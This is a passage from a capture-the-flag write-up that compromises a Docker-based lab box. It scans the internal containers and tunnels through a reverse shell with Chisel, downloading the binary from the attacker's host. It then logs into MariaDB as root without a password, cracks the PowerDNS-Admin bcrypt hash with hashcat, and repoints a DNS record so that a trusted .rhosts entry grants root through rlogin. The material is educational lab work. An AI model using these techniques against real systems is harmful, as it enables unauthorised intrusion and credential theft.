8081/tcp open tproxy
MAC Address: 02:42:53:61:05:FB (Unknown)
Nmap scan report for gitea.custom (172.18.0.2)
Host is up (0.000028s latency).
Not shown: 1155 closed ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:42:AC:12:00:02 (Unknown)
Nmap scan report for pdns-db-1.custom (172.18.0.4)
Host is up (0.000024s latency).
Not shown: 1155 closed ports
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 02:42:AC:12:00:04 (Unknown)
Nmap scan report for pdns-pdns-1.custom (172.18.0.5)
Host is up (0.000029s latency).
Not shown: 1154 closed ports
PORT STATE SERVICE
53/tcp open domain
8081/tcp open tproxy
MAC Address: 02:42:AC:12:00:05 (Unknown)
Nmap scan report for powerdns_admin.custom (172.18.0.6)
Host is up (0.000023s latency).
Not shown: 1155 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 02:42:AC:12:00:06 (Unknown)
Nmap scan report for 5ac6c7d6fb8e (172.18.0.3)
Host is up (0.0000090s latency).
Not shown: 1155 closed ports
PORT STATE SERVICE
8080/tcp open http-alt
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.08 seconds
There’s 6 hosts:
- .1 - Host, with all the same ports are my initial scan. 3000 is missing as it’s not in the top ports scanned by default, and 3306 and 8081 open not filtered. Probably nothing unique here.
- .2 -
nmapabove shows SSH only, but another scan of all ports shows 3000 as well. This is Gitea. - .3 - Webserver on 8080 is the Jenkins webhook from Gitea.
- .4 - 3306 open is MySQL.
- .5 -
nmapshows both 53 and 8081, which is an interesting combination.curlon 8081 returns just a 401 unauthorized. - .6 - Some kind of webserver on 80. A quick
curlof this port redirects to/login, which shows a title of PowerDNS-Admin. This could be related to the open DNS ports on .5.
Tunnel
I’ll use Chisel to create a proxy through my reverse shell to access the other containers from my VM. I’ll start the server on my host with --reverse to allow reverse connections and -p 8000 because Burp is already listening on the default port of 8080 on my host. Next I’ll upload the latest Linux binary to the container, make it executable, and connect:
root@5ac6c7d6fb8e:~# curl 10.10.14.79/chisel_1.10.0_linux_amd64 -o c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8736k 100 8736k 0 0 4460k 0 0:00:01 0:00:01 --:--:-- 4459k
root@5ac6c7d6fb8e:~# chmod +x c
root@5ac6c7d6fb8e:~# ./c client 10.10.14.79:8000 R:socks
2025/07/30 10:35:52 client: Connecting to ws://10.10.14.79:8000
2025/07/30 10:35:52 client: Connected (Latency 89.243677ms)
Chisel listens on 1080 as a socks proxy. I’ve got a proxy configured in FoxyProxy to use this tunnel:
I’ll switch to that profile and load http://172.18.0.6/:
Trying to visit http://172.18.0.5:8081 pops HTTP basic auth:
I can also use proxychains to connect from the command line. My proxychains.conf file is set up to use 127.0.0.1:1080 as a socks proxy:
oxdf@hacky$ cat /etc/proxychains.conf | grep -v '^#' | grep .
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 1080
This works to use the tunnel as well:
oxdf@hacky$ proxychains4 curl 172.18.0.6 -I
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.18.0.6:80 ... OK
HTTP/1.1 302 FOUND
Server: gunicorn
Date: Wed, 30 Jul 2025 11:01:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 199
Location: /login
Set-Cookie: _csrf_token=1f1bf92e2e293b81e4fa45db731e1f9d1bfa42a769e5d18809945a3308cc2621; Expires=Mon, 04 Aug 2025 11:01:04 GMT; Max-Age=432000; HttpOnly; Path=/; SameSite=Lax
Vary: Cookie
Set-Cookie: session=e0ad8f3f-4061-425a-9b48-c08f0ebf1325; Expires=Wed, 30 Jul 2025 11:11:04 GMT; HttpOnly; Path=/; SameSite=Lax
MySQL
I don’t have any password information for the MySQL service, but I can try connecting as root and it let’s met in:
oxdf@hacky$ proxychains4 mysql -h 172.18.0.4 -u root
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.18.0.4:3306 ... OK
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 222
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution
...[snip]...
mysql>
The non-default DB is powerdnsadmin:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin |
| sys |
+--------------------+
5 rows in set (0.09 sec)
Switching to that DB, there are several tables:
mysql> use powerdnsadmin
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------------+
| Tables_in_powerdnsadmin |
+-------------------------+
| account |
| account_user |
| alembic_version |
| apikey |
| apikey_account |
| comments |
| cryptokeys |
| domain |
| domain_apikey |
| domain_setting |
| domain_template |
| domain_template_record |
| domain_user |
| domainmetadata |
| domains |
| history |
| records |
| role |
| sessions |
| setting |
| supermasters |
| tsigkeys |
| user |
+-------------------------+
23 rows in set (0.09 sec)
There’s a single user:
mysql> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq | admin | admin | admin@build.vl | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.08 sec)
Most of the other tables are empty. There is one domain:
mysql> select * from domain;
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| id | name | master | type | serial | notified_serial | last_check | dnssec | account_id |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| 1 | build.vl | [] | Native | 2024050201 | 0 | 0 | 0 | NULL |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
1 row in set (0.09 sec)
The history table has interesting history:
mysql> select * from history;
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
| id | msg | detail | created_by | created_on | domain_id |
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
| 1 | User admin authentication succeeded | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1} | System | 2024-05-01 15:54:31 | NULL |
| 2 | Add zone build.vl | {"domain_type": "native", "domain_master_ips": [], "account_id": "0"} | admin | 2024-05-01 15:54:43 | 1 |
| 3 | Apply record changes to zone build.vl | {"domain": "build.vl", "add_rrsets": [{"name": "gitea.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.19.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "intern.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.20.0.1", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "jenkins.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.20.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.3", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}], "del_rrsets": []} | admin | 2024-05-01 15:56:57 | 1 |
| 4 | User admin authentication succeeded | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1} | System | 2024-05-01 16:32:24 | NULL |
| 5 | User admin authentication succeeded | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1} | System | 2024-05-02 10:07:19 | NULL |
| 6 | Apply record changes to zone build.vl | {"domain": "build.vl", "add_rrsets": [{"name": "db.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.4", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "gitea.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "intern.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.1", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "jenkins.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.3", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns-worker.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.5", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.6", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}], "del_rrsets": [{"comments": [{"content": "", "account": ""}], "name": "jenkins.build.vl.", "records": [{"content": "172.20.0.2", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "pdns.build.vl.", "records": [{"content": "172.18.0.3", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "intern.build.vl.", "records": [{"content": "172.20.0.1", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "gitea.build.vl.", "records": [{"content": "172.19.0.2", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}]} | admin | 2024-05-02 10:13:52 | 1 |
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
6 rows in set (0.09 sec)
records shows a bunch of subdomains configured:
mysql> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.09 sec)
PowerDNS-Admin
I’ll save the hash for the admin user to a file and pass it to hashcat. It looks a lot like bcrypt to me so I’ll use -m 3200 (though running with autodetect would show a list of bcrypt options):
$ hashcat powerdns.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -m 3200
hashcat (v6.2.6) starting
...[snip]...
$2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq:winston
...[snip]...
Now I can log in as admin, leaving the OTP token field empty (as it was Null in the user table):
In the build.vl zone, it shows the same subdomains as the table above:
This also helps confirm my analysis of the various containers.
Shell via rlogin
TCP 513 rlogin is open on the host and I already found a .rhosts file with two domains in it:
admin.build.vl +
intern.build.vl +
This says that coming from either of these domains, any can log in without a password. intern.build.vl is already set as the main host. admin.build.vl isn’t configured. I can edit the record for intern or add a record for admin pointing to my host, and then connect using rlogin as root.
I’ll edit admin:
rlogin logs in with the same username it’s being run as. On Reset, I had to create a user named sadm. Here I can just run as root:
oxdf@hacky$ sudo rlogin 10.129.234.169
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-144-generic x86_64)
...[snip]...
root@build:~#
And fetch root.txt:
root@build:~# cat root.txt
b7b1e481************************